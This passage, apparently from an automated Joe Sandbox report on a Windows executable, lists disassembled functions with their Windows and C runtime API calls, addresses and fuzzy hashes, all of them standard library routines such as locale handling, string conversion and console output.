            • Opcode Fuzzy Hash: 6f6551766e78dfaf1902ac4a10d661e029697619da613869b26e695c2ee2e33e
            • Instruction Fuzzy Hash: 92B134F1E0024AAFDB15DFA8C880BAE7BB1BF5B310F044158E5129B691C7799D01EF60
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: __freea$__alloca_probe_16$Info
            • String ID:
            • API String ID: 127012223-0
            • Opcode ID: 92730a0a459d33347b70571b78036777f44350b5b4b89d4bfa07e2a333230d42
            • Instruction ID: 4e5e23438182015142a4ade0f6828226adac9788748d70c27663b78b9aa9f394
            • Opcode Fuzzy Hash: 92730a0a459d33347b70571b78036777f44350b5b4b89d4bfa07e2a333230d42
            • Instruction Fuzzy Hash: 0A71B472E002056BDF219F968C82FEE77B9EF85324F184159E915FB281D63DDD04ABA0
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00F91C8F,?,00000001,00000000,00000002,00000001,?,00F91C8F,?), ref: 00F9AB5A
            • __alloca_probe_16.LIBCMT ref: 00F9AB86
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00F91C8F,?,00000000,00FC1DDE,00BD2978,?,?,?,00F96AAC), ref: 00F9ABC5
            • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00F91C8F,?,00000000,00FC1DDE,00BD2978), ref: 00F9ABE2
            • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00F91C8F,?,00000000,00FC1DDE,00BD2978), ref: 00F9AC21
            • __alloca_probe_16.LIBCMT ref: 00F9AC3E
            • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00F91C8F,?,00000000,00FC1DDE,00BD2978), ref: 00F9AC80
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00F91C8F,?,00000000,00FC1DDE,00BD2978), ref: 00F9ACA3
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ByteCharMultiStringWide$__alloca_probe_16
            • String ID:
            • API String ID: 2040435927-0
            • Opcode ID: 46d9792d4cd667e6adaed3b59a7117797e2498145a69770a5b5a8ee0e0bca09a
            • Instruction ID: cf4f4c773f98c67717ab29f1077795c3692e237f483653a5148016644f971826
            • Opcode Fuzzy Hash: 46d9792d4cd667e6adaed3b59a7117797e2498145a69770a5b5a8ee0e0bca09a
            • Instruction Fuzzy Hash: EB519D7290021AAFEF21AF64CC85FAA7BA9EB44760F144524F905AA250E735CC10FB92
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F9610D
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F9612B
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F9614C
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F9619C
            • std::_Facet_Register.LIBCPMT ref: 00F961C6
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F961DF
              • Part of subcall function 00F91930: ___std_exception_copy.LIBVCRUNTIME ref: 00F9196C
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
            • String ID:
            • API String ID: 728164013-0
            • Opcode ID: 4688965d1b435362ca2af69293a3f9363df5027f5acca38d138cec85b0ef81c5
            • Instruction ID: 087899902bca628b24111ce7a6fbb5e673261f48754bb3feb3892ecc8bded3e0
            • Opcode Fuzzy Hash: 4688965d1b435362ca2af69293a3f9363df5027f5acca38d138cec85b0ef81c5
            • Instruction Fuzzy Hash: 19212232A003119FEF25EF24E840A6AB3A0EB94760F14055DE99097252DB3EED46DB92
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F95A6D
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F95A8B
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95AAC
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95AFC
            • std::_Facet_Register.LIBCPMT ref: 00F95B26
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95B3F
              • Part of subcall function 00F91930: ___std_exception_copy.LIBVCRUNTIME ref: 00F9196C
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
            • String ID:
            • API String ID: 728164013-0
            • Opcode ID: 8c7811637517bc910d15c98f65fdd4ac9152fe837b80a1fe3ebcbd3aacc7ded7
            • Instruction ID: 2c78ee10e1816d78c5ecc8e5e54945dc8f99cf6878e49416dcd6e9961eca81c2
            • Opcode Fuzzy Hash: 8c7811637517bc910d15c98f65fdd4ac9152fe837b80a1fe3ebcbd3aacc7ded7
            • Instruction Fuzzy Hash: A321D531A003119FEB26EF24E88495AB7A0FB94760F14051DE98097251DB3DAD0ADBD2
            APIs
            • GetLastError.KERNEL32(?,?,00F9E191,00F9C74C,00F9B846), ref: 00F9E1A8
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F9E1B6
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F9E1CF
            • SetLastError.KERNEL32(00000000,00F9E191,00F9C74C,00F9B846), ref: 00F9E221
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 5207e3dfc82c5e4d60ecba039810b6a50a0fd7352a3d023dc27b5b53eb69568f
            • Instruction ID: 9216480a04de168e4adc27ea40df05cbb008c0cead2777cc039eec79b0e6fb8c
            • Opcode Fuzzy Hash: 5207e3dfc82c5e4d60ecba039810b6a50a0fd7352a3d023dc27b5b53eb69568f
            • Instruction Fuzzy Hash: 5D01F733A0D6166EBF2467B4BCC6F2A3A59DB01775720033AF510C21E1EF655C89B585
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C488A511,?,?,00000000,00FB86B3,000000FF,?,00FA6980,00000002,?,00FA6954,00FA302A), ref: 00FA6A25
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA6A37
            • FreeLibrary.KERNEL32(00000000,?,?,00000000,00FB86B3,000000FF,?,00FA6980,00000002,?,00FA6954,00FA302A), ref: 00FA6A59
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: b3782e5933301b05af27d11c504c1bf230c5bc3a503679418f941b35d6e0a1fc
            • Instruction ID: b544c8781a565f33af2e110b569697cf23b433cc447676cbfa6cabbe066ee057
            • Opcode Fuzzy Hash: b3782e5933301b05af27d11c504c1bf230c5bc3a503679418f941b35d6e0a1fc
            • Instruction Fuzzy Hash: C101A271A04619EBCB11DF54CD09BAEBBFCFB05B50F044625E822F22D0DB78A800EE81
            APIs
            • __alloca_probe_16.LIBCMT ref: 00FAED29
            • __alloca_probe_16.LIBCMT ref: 00FAEDEA
            • __freea.LIBCMT ref: 00FAEE51
              • Part of subcall function 00FA9B87: RtlAllocateHeap.NTDLL(00000000,00FAFFAD,?,?,00FAFFAD,00000220,?,00000010,?), ref: 00FA9BB9
            • __freea.LIBCMT ref: 00FAEE66
            • __freea.LIBCMT ref: 00FAEE76
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: __freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 1423051803-0
            • Opcode ID: d5b9c46ee0ead905a9c3c27dd6e730dad1a3165cf7521729bed1e79d245667ef
            • Instruction ID: 0d43010c7bba780468c3f98830f3f140931ab119facd218c25cc0f0b7a80f272
            • Opcode Fuzzy Hash: d5b9c46ee0ead905a9c3c27dd6e730dad1a3165cf7521729bed1e79d245667ef
            • Instruction Fuzzy Hash: E551C3F2A00206AFEF219FA4CC81EBB76A9EF46760F154528FD08D7150E775DD14A7A0
            APIs
            • __EH_prolog3.LIBCMT ref: 00F97BE3
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F97BED
              • Part of subcall function 00F91AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00F91ACF
              • Part of subcall function 00F91AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F91AEA
            • codecvt.LIBCPMT ref: 00F97C27
            • std::_Facet_Register.LIBCPMT ref: 00F97C3E
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F97C5E
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
            • String ID:
            • API String ID: 712880209-0
            • Opcode ID: 88534b67536b5ab589f1297c5fe852548982c93b191fc89e934f9f10b4469875
            • Instruction ID: e4ad07e726c6b26f16ec289ea911bc5be9449c74ce7340383b3cc0f7ae75da65
            • Opcode Fuzzy Hash: 88534b67536b5ab589f1297c5fe852548982c93b191fc89e934f9f10b4469875
            • Instruction Fuzzy Hash: 1A11DC31D143259FEF05EF68CD456AEBBA4BF84360F24040AF401A7381DFB89E01AB91
            APIs
            • __EH_prolog3.LIBCMT ref: 00F99316
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F99320
              • Part of subcall function 00F91AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00F91ACF
              • Part of subcall function 00F91AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F91AEA
            • codecvt.LIBCPMT ref: 00F9935A
            • std::_Facet_Register.LIBCPMT ref: 00F99371
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F99391
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
            • String ID:
            • API String ID: 712880209-0
            • Opcode ID: 2f30e28b649b0b633a813aa46913e9ac3caaa55e7bdd5a7536262f02906b67c0
            • Instruction ID: a58172100d46b56d42612704bece38b06118874d23dc9ddd9a0f3776344d73d2
            • Opcode Fuzzy Hash: 2f30e28b649b0b633a813aa46913e9ac3caaa55e7bdd5a7536262f02906b67c0
            • Instruction Fuzzy Hash: AA11AF359142159BEF15EF68CD05BAEB7B9BF84760F25050DE401A7281DFB89E00AB91
            APIs
            • __EH_prolog3.LIBCMT ref: 00F98F9E
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F98FA9
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F99017
              • Part of subcall function 00F990FA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F99112
            • std::locale::_Setgloballocale.LIBCPMT ref: 00F98FC4
            • _Yarn.LIBCPMT ref: 00F98FDA
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
            • String ID:
            • API String ID: 1088826258-0
            • Opcode ID: 9b965e51e4cb54bb4dae27b21cc0bd4deb8b52673132b3a7b1b03ecbea8c97bc
            • Instruction ID: 84031129ba3c07ea13fc2a07e10d1f01b778fa537565416d58461fe40317f297
            • Opcode Fuzzy Hash: 9b965e51e4cb54bb4dae27b21cc0bd4deb8b52673132b3a7b1b03ecbea8c97bc
            • Instruction Fuzzy Hash: 1E019A79A042519BEB1AFB24DD4597D7771BB85390B15000CE92197381CFBCAA02EB92
            APIs
            • ___std_exception_copy.LIBVCRUNTIME ref: 00F922CD
              • Part of subcall function 00F9BC00: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F9BB23,?,?,?,?,00F9BB23,?,00FC40FC,?), ref: 00F9BC60
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionRaise___std_exception_copy
            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
            • API String ID: 3109751735-1866435925
            • Opcode ID: 958c8a6609a6facc7bcfe6ec7f026b9e2768a0bc3c569ead0d65ec1802367a78
            • Instruction ID: 1e6a91f3f875fbcfbe2022dc6769a2321a462d15466c8fa2225852d19626156a
            • Opcode Fuzzy Hash: 958c8a6609a6facc7bcfe6ec7f026b9e2768a0bc3c569ead0d65ec1802367a78
            • Instruction Fuzzy Hash: 221136B2D043056BEB50DF58D802FDAB3E8BF45310F04862AF95897242F775E854EBA2
            APIs
            • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00F9F293,00000000,00000001,010117F4,?,?,?,00F9F436,00000004,InitializeCriticalSectionEx,00FBBE28,InitializeCriticalSectionEx), ref: 00F9F2EF
            • GetLastError.KERNEL32(?,00F9F293,00000000,00000001,010117F4,?,?,?,00F9F436,00000004,InitializeCriticalSectionEx,00FBBE28,InitializeCriticalSectionEx,00000000,?,00F9F1ED), ref: 00F9F2F9
            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00F9E103), ref: 00F9F321
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID: api-ms-
            • API String ID: 3177248105-2084034818
            • Opcode ID: e49c9b744fa938ddeeb71236db4d029829762d11df52caf75650c2d3ab3b9f0f
            • Instruction ID: 8d921f5885497e0a410263f51c976bfc50829f14b9c819e7142d212ec4e8ee43
            • Opcode Fuzzy Hash: e49c9b744fa938ddeeb71236db4d029829762d11df52caf75650c2d3ab3b9f0f
            • Instruction Fuzzy Hash: 8CE04870644208B7EF102B61DC46F993F549F04B90F540030F90CE44E1E7A5D859BD86
            APIs
            • GetConsoleOutputCP.KERNEL32(C488A511,00000010,00000000,?), ref: 00FABDF9
              • Part of subcall function 00FAF09E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FAEE47,?,00000000,-00000008), ref: 00FAF14A
            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FAC054
            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FAC09C
            • GetLastError.KERNEL32 ref: 00FAC13F
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
            • String ID:
            • API String ID: 2112829910-0
            • Opcode ID: cfa9674a9e6f4e835c29b8af1c4b10197535daaa95333cff7b5fcd24c281e2d6
            • Instruction ID: 51d471af6b062b1d5368bb25c13a69d1fc9e3df8b0f79db6058f9d0040e02257
            • Opcode Fuzzy Hash: cfa9674a9e6f4e835c29b8af1c4b10197535daaa95333cff7b5fcd24c281e2d6
            • Instruction Fuzzy Hash: 99D14AB5E042489FCB15CFA8C8809EDBBB5FF0A314F18812AE565EB342D734A941DB90
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: 4851a50e04e6abde082f322ec2d04853ab54c8a8490b9c2d336911177529cbcb
            • Instruction ID: b20020870c94560079c9b4da3797a606cc8236079ea7932c74c3ed66a186aea6
            • Opcode Fuzzy Hash: 4851a50e04e6abde082f322ec2d04853ab54c8a8490b9c2d336911177529cbcb
            • Instruction Fuzzy Hash: D051C172A00206AFFF29CF55D881FBA7BA4EF44724F14456DE945872A1E735EC80EB90
            APIs
              • Part of subcall function 00FAF09E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FAEE47,?,00000000,-00000008), ref: 00FAF14A
            • GetLastError.KERNEL32 ref: 00FAF51E
            • __dosmaperr.LIBCMT ref: 00FAF525
            • GetLastError.KERNEL32(?,?,?,?), ref: 00FAF55F
            • __dosmaperr.LIBCMT ref: 00FAF566
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
            • String ID:
            • API String ID: 1913693674-0
            • Opcode ID: 15d8bf7b618d02ee11200fd7ec2f1fcc144d17ccbd7cae335ed513847f311bf5
            • Instruction ID: 9b52b0bc922c4fa5a84c0a4c0e6361d7fb8bb8472aacdb2fd334bdbc80c8dc07
            • Opcode Fuzzy Hash: 15d8bf7b618d02ee11200fd7ec2f1fcc144d17ccbd7cae335ed513847f311bf5
            • Instruction Fuzzy Hash: 5F21B3F1E00205AF9B20AFB5CC8096BB7A8EF063647148928F969CB111D734ED44ABA0
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3709f8579ff3ce8d2a7f9e66dbcdc30f2804e5d9c017654f77626fbdb898aa27
            • Instruction ID: 849bcea439eadf01090873cf9a49b8672be1a1c9befbb8f88fa3f4a6bfc7956e
            • Opcode Fuzzy Hash: 3709f8579ff3ce8d2a7f9e66dbcdc30f2804e5d9c017654f77626fbdb898aa27
            • Instruction Fuzzy Hash: 9F21C0F2B04A05BFDB20AF64DCC096B77ADAF12B647104624F925DB141E735EE40ABA0
            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 00FB0458
              • Part of subcall function 00FAF09E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FAEE47,?,00000000,-00000008), ref: 00FAF14A
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FB0490
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FB04B0
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
            • String ID:
            • API String ID: 158306478-0
            • Opcode ID: 281c5b80bb346a91e7f245610be3ad46f4280d6f4c204d078ffff0ba49c7d826
            • Instruction ID: bec4c96e980200e634711c19ae35bdec46448fa8983f4d7ffc6ea40395a3ac15
            • Opcode Fuzzy Hash: 281c5b80bb346a91e7f245610be3ad46f4280d6f4c204d078ffff0ba49c7d826
            • Instruction Fuzzy Hash: 5911A1E6901219BF662177B69CC9CBFB95CDE8A3E47104124FA0691101FEB8CD0169B2
            APIs
            • WriteConsoleW.KERNEL32(00000010,00000000,00FC3A70,00000000,00000010,?,00FB4EA2,00000010,00000001,00000010,?,?,00FAC193,?,00000010,00000000), ref: 00FB669D
            • GetLastError.KERNEL32(?,00FB4EA2,00000010,00000001,00000010,?,?,00FAC193,?,00000010,00000000,?,?,?,00FAC71A,00000010), ref: 00FB66A9
              • Part of subcall function 00FB666F: CloseHandle.KERNEL32(FFFFFFFE,00FB66B9,?,00FB4EA2,00000010,00000001,00000010,?,?,00FAC193,?,00000010,00000000,?,?), ref: 00FB667F
            • ___initconout.LIBCMT ref: 00FB66B9
              • Part of subcall function 00FB6631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FB6660,00FB4E8F,?,?,00FAC193,?,00000010,00000000,?), ref: 00FB6644
